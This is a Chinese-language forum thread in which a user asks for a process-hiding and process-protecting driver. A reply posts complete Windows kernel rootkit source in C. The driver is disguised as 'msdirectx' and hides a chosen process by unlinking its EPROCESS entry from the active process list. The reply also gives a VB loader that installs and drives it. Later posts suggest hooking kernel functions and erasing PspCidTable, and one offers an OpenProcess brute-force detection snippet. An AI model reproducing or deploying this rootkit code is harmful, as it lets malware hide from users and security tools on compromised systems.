求助一个可以保护进程和隐藏进程的驱动
求助一个可以保护进程和隐藏进程的驱动程序最好带VB的保护例子
你要送点水晶给我啊!
回复 1# 阿杰 include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
#define FILE_DEVICE_ROOTKIT 0x00002a7b
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
int FLINKOFFSET;
int PIDOFFSET;
PDEVICE_OBJECT g_RootkitDevice;
const WCHAR deviceLinkBuffer[]= L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[]= L"\\Device\\msdirectx";
#define DebugPrint DbgPrint
DWORD FindProcessEPROC(int);
NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
NTSTATUS RootkitDeviceControl(IN PFILE_OBJECT, IN BOOLEAN, IN PVOID,
IN ULONG, OUT PVOID, IN ULONG, IN ULONG,
OUT PIO_STATUS_BLOCK, IN PDEVICE_OBJECT
);
NTSTATUS DriverEntry(
IN PDRIVER_OBJECTDriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
UNICODE_STRING deviceLinkUnicodeString;
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
ntStatus = IoCreateDevice ( DriverObject,
0, // For driver extension
&deviceNameUnicodeString,
FILE_DEVICE_ROOTKIT,
0,
TRUE,
&g_RootkitDevice );
if( NT_SUCCESS(ntStatus)) {
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
DriverObject->MajorFunction =
DriverObject->MajorFunction =
DriverObject->MajorFunction =
DriverObject->MajorFunction= RootkitDispatch;
DriverObject->DriverUnload = RootkitUnload;
}
else
{
DebugPrint(("Failed to create device!\n"));
return ntStatus;
}
return STATUS_SUCCESS;
}
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj != NULL)
{
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
NTSTATUS
RootkitDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS ntstatus;
ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
irpStack = IoGetCurrentIrpStackLocation (Irp);
inputBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = Irp->AssociatedIrp.SystemBuffer;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
ntstatus = RootkitDeviceControl( irpStack->FileObject, TRUE,
inputBuffer, inputBufferLength,
outputBuffer, outputBufferLength,
ioControlCode, &Irp->IoStatus, DeviceObject );
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntstatus;
}
NTSTATUS
RootkitDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
int find_PID = 0;
DWORD eproc = 0x00000000;
DWORD start_eproc= 0x00000000;
PLIST_ENTRY plist_active_procs = NULL;
IoStatus->Status = STATUS_SUCCESS;
IoStatus->Information = 0;
switch ( IoControlCode )
{
case IOCTL_ROOTKIT_INIT:
if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
PIDOFFSET = (int) (*(int *)InputBuffer);
FLINKOFFSET = (int) (*((int *)InputBuffer+1));
break;
case IOCTL_ROOTKIT_HIDEME:
if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
find_PID = *((DWORD *)InputBuffer);
if (find_PID == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
break;
default:
IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return IoStatus->Status;
}
DWORD FindProcessEPROC (int terminate_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
PLIST_ENTRY plist_active_procs;
if (terminate_PID == 0)
return terminate_PID;
eproc = (DWORD) PsGetCurrentProcess();
start_PID = *((DWORD*)(eproc+PIDOFFSET));
current_PID = start_PID;
while(1)
{
if(terminate_PID == current_PID)
return eproc;
else if((i_count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
VB加载及通信代码:
Option Explicit
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Dim Load_Drv As New cls_Driver
Private Sub Command1_Click()
dim ret as byte
If Text1.Text <> "" Then
If CLng(Text1.Text) <> GetCurrentProcessId Then
With Load_Drv
(.CTL_CODE_GEN(&H1), VarPtr(CLng(Text1.Text)), 4, ret, Len(ret))
End With
End If
End If
End Sub
Private Sub Form_Load()
Dim RetInstDrv As Boolean, RetStartDrv As Boolean, RetOpenDrv As Boolean
With Load_Drv
.szDrvFilePath = App.Path & "\msdirectx.sys"
.szDrvLinkName = "msdirectx"
.szDrvSvcName = "msdirectx"
.szDrvDisplayName = "msdirectx"
RetInstDrv = .InstDrv
RetStartDrv = .StartDrv
RetOpenDrv = .OpenDrv
End With
If RetInstDrv = False Or RetStartDrv = False Or RetOpenDrv = False Then
MsgBox "驱动加载失败", 16, ""
End If
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
With Load_Drv
.DelDrv
End With
End Sub
看代码吧。。。很明了了。。我在网上找的代码 楼上是隐藏加保护?! 进程保护,差不多的方法。。。Hook 相关内核函数就是了 回复 2# oopww
记得说明是我首发的! 本帖最后由 xiaoly99 于 2010-1-23 14:27 编辑
好像可以抹PspCidTable和进程活动链 楼主看这帖子:http://www.vbgood.com/viewthread.php?tid=90584 为啥我就是上不了VBgood?
话说*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;这是用来干嘛的?明明不用也照样隐藏 感谢分享 回复 6# HoviDelphic
下次记得的。。 C++................ 给大家一个检测的方法,OpenProcess从PID=1到??? 本帖最后由 乔丹二世 于 2010-7-2 00:32 编辑
给大家一个检测的方法,OpenProcess从PID=1到???
jiedengye 发表于 2010-6-30 15:39 http://www.m5home.com/bbs/images/common/back.gif
这个方法很老了吧,C代码大概如此:
int i;
HANDLE hProcess;
for(i=0;i<20000;i+=4)
{
hProcess=OpenProcess(PROCESS_QUERY_INFORMATION,0,i);
if(hProcess>0)
{
printf("%d\n",i);
CloseHandle(hProcess);
}
}
代码染色器在这里:http://www.m5home.com/bbs/thread-3834-1-1.html 原来就算摘了链,PID实际上还是存在的呀,HOHO. 进程调度不会从链表中查找进程,EPROCESS的活动链表知识一种记录方式 回复乔丹二世
记得CLOSEHANDLE
本网站最牛的人 发表于 2010-6-30 21:53 http://www.m5home.com/bbs/images/common/back.gif
感谢“本网站最牛的人”提醒! 给大家一个检测的方法,OpenProcess从PID=1到???
jiedengye 发表于 2010-6-30 15:39 http://www.m5home.com/bbs/images/common/back.gif
在用我的代码前先用RtlAdjustPrivilege获得SE_DEBUG权限。
页:
[1]